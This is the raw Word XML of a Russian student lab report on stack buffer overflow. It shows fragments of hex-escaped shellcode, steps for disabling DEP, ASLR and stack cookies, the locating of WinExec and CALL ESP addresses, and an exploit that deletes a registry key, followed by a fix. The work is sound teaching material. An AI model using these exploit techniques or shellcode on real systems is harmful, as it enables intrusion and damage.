        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>45\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c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45\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>54\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>45\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48\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b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43\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>55\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c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5</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c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</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b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65\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>79\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2</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f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76\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74\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>65\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>73\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>74\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>20\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED" w:rsidRPr="00ED0BED">
        <w:t>66"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738C58C8" w14:textId="63F4B546" w:rsidR="00904017" w:rsidRDefault="00904017" w:rsidP="00904017">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r w:rsidRPr="00904017">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A7035B6" wp14:editId="2DC95D49">
            <wp:extent cx="3115110" cy="163852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327E" w14:textId="5E6A9345" w:rsidR="00904017" w:rsidRDefault="00904017" w:rsidP="00904017">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 1. Отключение защиты от непрямых вызовов</w:t>
      </w:r>
      <w:r w:rsidR="00C80D96">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A0AC36" w14:textId="1387B70B" w:rsidR="00AD14A3" w:rsidRDefault="00AD14A3" w:rsidP="00AD14A3">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD14A3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53173AB5" wp14:editId="3D341EA0">
            <wp:extent cx="4058216" cy="16004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EF72" w14:textId="49DCF94C" w:rsidR="00AD14A3" w:rsidRPr="00AD14A3" w:rsidRDefault="00AD14A3" w:rsidP="00AD14A3">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 2. Отключение предотвращения выполнения данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFA57F8" w14:textId="34FC74CC" w:rsidR="00414CE3" w:rsidRDefault="00414CE3" w:rsidP="00414CE3">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r w:rsidRPr="00414CE3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="271F85C3" wp14:editId="1DD84FBC">
            <wp:extent cx="6300470" cy="273240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8169" w14:textId="67555933" w:rsidR="00414CE3" w:rsidRDefault="00414CE3" w:rsidP="00414CE3">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Рисунок</w:t>
      </w:r>
      <w:r w:rsidRPr="00414CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD14A3" w:rsidRPr="005E4481">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00414CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Отключение</w:t>
      </w:r>
      <w:r w:rsidRPr="00414CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Buffer Security Check </w:t>
      </w:r>
      <w:r>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00414CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Visual Studio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504BDCE2" w14:textId="159E1A44" w:rsidR="004B3DD0" w:rsidRDefault="005E4481" w:rsidP="004B3DD0">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E4481">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D625820" wp14:editId="70DBB105">
            <wp:extent cx="2353003" cy="39058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56B5" w14:textId="536C742F" w:rsidR="004B3DD0" w:rsidRDefault="004B3DD0" w:rsidP="004B3DD0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 4. Адрес функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178CD86D" w14:textId="6C2C2136" w:rsidR="00725EA8" w:rsidRDefault="00725EA8" w:rsidP="00725EA8">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00725EA8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="078DEF90" wp14:editId="6B2C1AB6">
            <wp:extent cx="2229161" cy="3238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0621" w14:textId="501DC839" w:rsidR="00725EA8" w:rsidRPr="00725EA8" w:rsidRDefault="00725EA8" w:rsidP="00725EA8">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Адрес функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="00725EA8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:r w:rsidRPr="005E4481">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6F546F" w14:textId="40BA887F" w:rsidR="002F140F" w:rsidRDefault="003B1360" w:rsidP="002F140F">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B1360">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F13463B" wp14:editId="317A13F6">
            <wp:extent cx="6211167" cy="2362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7AC3" w14:textId="3CE87017" w:rsidR="002F140F" w:rsidRDefault="002F140F" w:rsidP="002F140F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00ED0BED">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>. Созданный в реестре ключ для удаления</w:t>
      </w:r>
      <w:r w:rsidR="00CF1594">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4788EAA2" w14:textId="77777777" w:rsidR="00522F76" w:rsidRPr="00522F76" w:rsidRDefault="00522F76" w:rsidP="00347734">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00522F76">
        <w:t>Была разработана программа “key_deleter.exe”, которая по заранее известному размеру буфера запускала уязвимую программу и с помощью переполнения буфера вызывала удаление ключа key в реестре (Приложение 2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032AB4AD" w14:textId="3342EF50" w:rsidR="00522F76" w:rsidRDefault="00ED0BED" w:rsidP="00347734">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Была запущена атакующая программа и в результате ключ реестра был удален (рисунок 7).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E397EC" w14:textId="45B281D8" w:rsidR="00ED0BED" w:rsidRDefault="003B1360" w:rsidP="003B1360">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r w:rsidRPr="003B1360">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CB600BB" wp14:editId="1D46F1AF">
            <wp:extent cx="6039693" cy="23815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08F1" w14:textId="335C85A1" w:rsidR="003B1360" w:rsidRDefault="003B1360" w:rsidP="003B1360">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 7. Результат работы атакующей программы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BAC61E" w14:textId="2AAEB8C6" w:rsidR="00347734" w:rsidRDefault="00347734" w:rsidP="00347734">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Была установлена утилита </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CPPpat</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60107F59" w14:textId="70A6CA45" w:rsidR="00347734" w:rsidRDefault="00347734" w:rsidP="00347734">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">При анализе утилитой </w:t>
      </w:r>
      <w:r w:rsidRPr="00347734">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CPPcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00347734">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>не было обнаружено никаких проблем в уязвимой программе (рисунок 8).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3662F879" w14:textId="0C5FEBC4" w:rsidR="00347734" w:rsidRDefault="00347734" w:rsidP="00347734">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r w:rsidRPr="00347734">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DBC6E10" wp14:editId="70D73D84">
            <wp:extent cx="4867954" cy="59063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6697" w14:textId="53AB2CF9" w:rsidR="00347734" w:rsidRPr="00347734" w:rsidRDefault="00347734" w:rsidP="00347734">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 8. Анализ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CPPcat</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5CCB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>уязвимой функции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7F5357" w14:textId="6B867941" w:rsidR="003B1360" w:rsidRDefault="00347734" w:rsidP="00347734">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Была</w:t>
      </w:r>
      <w:r w:rsidR="003E66F4">
        <w:t xml:space="preserve"> исправлена уязвимая функция на более безопасную (Приложение 3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E6AEA9" w14:textId="76C24992" w:rsidR="00347734" w:rsidRDefault="00347734" w:rsidP="00347734">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После исправления функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CPPcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00347734">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">так же не показал никаких проблем (рисунок </w:t>
      </w:r>
      <w:r w:rsidR="004B4995">
        <w:t>9).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168D56BC" w14:textId="46ECE58C" w:rsidR="004B4995" w:rsidRDefault="004B4995" w:rsidP="004B4995">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r w:rsidRPr="004B4995">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B8D68F1" wp14:editId="7AFFEB25">
            <wp:extent cx="4696480" cy="66684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67C" w14:textId="1F733177" w:rsidR="004B4995" w:rsidRPr="004B4995" w:rsidRDefault="004B4995" w:rsidP="004B4995">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 9. Анализ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CPPcat</w:t>
      </w:r>
      <w:r w:rsidRPr="004B4995">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>исправленной уязвимой функции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDD78C0" w14:textId="57149F80" w:rsidR="003B5921" w:rsidRDefault="003B5921" w:rsidP="00347734">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После исправления функции ключ реестра не был удален (рисунок </w:t>
      </w:r>
      <w:r w:rsidR="004B4995">
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7936ED25" w14:textId="7CB1C4BA" w:rsidR="003B5921" w:rsidRDefault="003B5921" w:rsidP="003B5921">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r w:rsidRPr="003B1360">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EFEAFDB" wp14:editId="318955EA">
            <wp:extent cx="6046839" cy="2300025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3208" cy="2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3284" w14:textId="37FFBCCB" w:rsidR="004B3DD0" w:rsidRDefault="003B5921" w:rsidP="003B5921">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="004B4995">
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>. Результат выполнения атакующей программы после исправления уязвимой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C83317" w14:textId="30B12613" w:rsidR="00442614" w:rsidRDefault="00442614" w:rsidP="00442614">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>ответы на контрольные вопросы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170E7AE6" w14:textId="536347AF" w:rsidR="00442614" w:rsidRDefault="00290073" w:rsidP="00290073">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00290073">
        <w:t>Какие основные этапы выделяются при реализации атаки, эксплуатирующей уязвимость типа «переполнение буфера»?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4057EA1B" w14:textId="77777777" w:rsidR="00665589" w:rsidRDefault="00665589" w:rsidP="00665589">
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Вычисление размера входной последовательности, при которой происходит переполнение буфера;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BCF0DE" w14:textId="77777777" w:rsidR="00665589" w:rsidRDefault="00665589" w:rsidP="00665589">
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Получение необходимых адресов команд, которые помогают передать управление на шелл-код;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76712D11" w14:textId="77777777" w:rsidR="00665589" w:rsidRDefault="00665589" w:rsidP="00665589">
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Написание шелл-кода;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C1EFB9" w14:textId="6EDADCC2" w:rsidR="00665589" w:rsidRDefault="00665589" w:rsidP="00665589">
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Атака.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC36867" w14:textId="05F44410" w:rsidR="00290073" w:rsidRDefault="00665589" w:rsidP="00665589">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00665589">
        <w:t>Почему стек является уязвимым при передаче параметров функции?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E3D90E" w14:textId="7B5F2C65" w:rsidR="00665589" w:rsidRDefault="00665589" w:rsidP="00665589">
      <w:r w:rsidRPr="00665589">
        <w:lastRenderedPageBreak/>
        <w:t>Стек ― структура данных, работающая по принципу «последний вошёл, первый вышел» (англ. LIFO ― last in first out). То есть, элементы в стек складываются друг за другом, и достать для обработки можно только тот элемент, который был помещён в стек позже всех остальных. Поскольку размер стека ограничен, старые данные могут затираться при записи новых, следовательно, программа «ломается», так как не может завершиться правильно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41606D5C" w14:textId="0D37238B" w:rsidR="00665589" w:rsidRDefault="00665589" w:rsidP="00665589">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00665589">
        <w:t>Одинаков ли адрес инструкций CALL ESP в различных версиях операционной системы Windows?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175B40EC" w14:textId="0EFD0C65" w:rsidR="00665589" w:rsidRPr="007A5CCB" w:rsidRDefault="00665589" w:rsidP="00E0508E">
      <w:r w:rsidRPr="00665589">
        <w:t xml:space="preserve">Адрес инструкции CALL ESP может отличаться в зависимости от </w:t>
      </w:r>
      <w:r w:rsidR="007A5CCB">
        <w:t xml:space="preserve">версий и разрядности системы, от работы </w:t>
      </w:r>
      <w:r w:rsidR="007A5CCB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r w:rsidR="007A5CCB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6BAE04" w14:textId="2CBF1D25" w:rsidR="00665589" w:rsidRDefault="00665589" w:rsidP="00665589">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00665589">
        <w:t>Могут ли инструкции быть выполнены где-либо, кроме сегмента кода?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACDE165" w14:textId="0F04DA68" w:rsidR="00665589" w:rsidRPr="00665589" w:rsidRDefault="00E0508E" w:rsidP="00665589">
      <w:r w:rsidRPr="00E0508E">
        <w:t>Любая последовательность байт будет выполнена, если на неё передано управление, поскольку невозможно отличить сегмент кода от других сегментов, расположение кода также не имеет значения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743ED216" w14:textId="483B73EA" w:rsidR="00665589" w:rsidRDefault="00665589" w:rsidP="00665589">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00665589">
        <w:t>Опишите работу механизма защиты Data Execution Prevention. Каким образом он позволяет защитить систему от эксплуатации уязвимостей типа «переполнение буфера»?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDAB153" w14:textId="4A03DC2B" w:rsidR="00E0508E" w:rsidRPr="00442614" w:rsidRDefault="00E0508E" w:rsidP="00E0508E">
      <w:r w:rsidRPr="00E0508E">
        <w:t>Память процессов в операционной системе Windows является страничной. При этом каждая страница может быть исполняемой или неисполняемой в зависимости от маркера. При попытке передачи управления на код, хранящийся на неисполняемой странице, будет сгенерировано исключение. Программы пишутся с чётким разделением сегментов кода, данных и прочей информации. Таким образом, есть возможность поместить всё, кроме кода, на неисполняемые страницы, что предотвращает выполнение нежелательного кода. Для этого всего требуется, чтобы операционная система поддерживала задание типа страниц и обрабатывала исключения при попытке выполнения кода с неисполняемой страницы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620C945E" w14:textId="77777777" w:rsidR="00E0508E" w:rsidRDefault="00AC78CC" w:rsidP="00B929E1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>Выводы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA280C6" w14:textId="09051B67" w:rsidR="00AC78CC" w:rsidRDefault="00E0508E" w:rsidP="00E0508E">
      <w:r w:rsidRPr="00E0508E">
        <w:t xml:space="preserve">В ходе лабораторной работы исследована уязвимость типа «переполнение буфера»: разработана целенаправленно уязвимая программа, проведён анализ </w:t>
      </w:r>
      <w:r w:rsidRPr="00E0508E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">механизма переполнения стека и зафиксированы изменения содержимого кадра стека при подаче длинного входного аргумента. Выполнен контрольный эксперимент по формированию входной последовательности и документирован момент перезаписи областей памяти, отвечающих за возврат управления. </w:t>
      </w:r>
      <w:r>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0508E">
        <w:t>несённые правки</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E0508E">
        <w:t>устранили возможность перезаписи адреса возврата в исследованных сценариях.</w:t>
      </w:r>
      <w:r w:rsidR="00AC78CC">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CA6F1F" w14:textId="77777777" w:rsidR="00E0508E" w:rsidRPr="00E0508E" w:rsidRDefault="00E0508E" w:rsidP="00E0508E"/>
    <w:p w14:paraId="3C671998" w14:textId="3B0319BC" w:rsidR="00F11C0C" w:rsidRDefault="00F11C0C" w:rsidP="00F11C0C">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>Приложения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3587D0" w14:textId="036F8A74" w:rsidR="00725EA8" w:rsidRDefault="00F4751B" w:rsidP="00725EA8">
      <w:r>
        <w:t>Приложение 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0537F564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(linker,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"/DYNAMICBASE:NO"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CDB17A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(linker,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"/NXCOMPAT:NO"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1E7F58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check_stack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082DA1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comment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(linker,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"/GS-"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CB7174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strict_gs_check(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off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CC1B33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3C45DF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54516DC0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52EC549D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4F76DA29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27A63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easy_func(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text_arr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4DE6FC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buf[4] = { 0 };</w:t>
      </w:r>
    </w:p>
